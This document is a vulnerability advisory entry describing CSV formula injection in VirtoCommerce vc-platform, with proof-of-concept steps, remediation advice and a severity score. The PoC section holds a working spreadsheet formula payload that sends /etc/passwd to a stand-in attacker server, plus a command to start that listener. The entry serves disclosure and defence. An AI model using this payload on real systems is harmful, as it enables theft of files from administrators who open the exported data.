Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

WS-2021-0489

Date: December 15, 2021

Overview

In “vc-platform(VirtoCommerce)” 3.0.0-rc.1 to 3.79.0 an attacker with low privileges can create a new product with malicious CSV commands in the title of the product. After that, when the administrator exports the data in CSV format, there is no check of the Title field of the product which can lead to execution of arbitrary commands on the system.

Details

In “vc-platform(VirtoCommerce)” an attacker with low privileges can create a new product with malicious CSV commands in the title of the product. After that, when the administrator exports the data in CSV format, there is no check of the Title field of the product which can lead to execution of arbitrary commands on the system.

PoC Details

Login to the application with a manager role user that has administrative privileges for the electronics store. This is considered low privileges (this is not an administrative role of the application). Click on the “More” option from the left pane and then click the “Catalog” option. Click on the “Clothing” section, then click the “Accessories” section. Then select the bags section and create a new product: choose “physical product” and insert the following payload in the Name field of the product and click create.
Then login as admin and export the products (go to the same page as you did with the first user and click the “export” button ->VirtoCommerce Csv Export -> Start Export). You’ll be provided with a download link. Click it and open the csv file. Click the name of our product (test-poc) and you’ll be referred to an unknown page. Look at the terminal on the attacker server and you’ll see that the passwd file content was sent there.

PoC Code

Set up a server: 
Python3 -m http.server yourPort --bind=yourIP

Payload:
=HYPERLINK(CONCATENATE("http://yourIP:yourPort/123.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "test-poc")

Affected Environments

3.0.0-rc.1 to 3.79.0

Remediation

To Remediate it, ensure that no cells begin with any of the following characters:
Equals to (“=”)
Plus (“+”)
Minus (“-“)
At (“@”)
Tab (0x09)
Carriage return (0x0D)

Prevention

no fix

Language: C#

Good to know:

icon

Improper Neutralization of Formula Elements in a CSV File

CWE-1236
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High

Related Resources (2)

https://github.com/VirtoCommerce/vc-module-catalog-csv-import/blob/f9f277393276997c5109b4439eb22813a692e053/VirtoCommerce.CatalogCsvImportModule.Data/Services/CsvCatalogExporter.cs#L37
https://www.mend.io/vulnerability-database/WS-2021-0489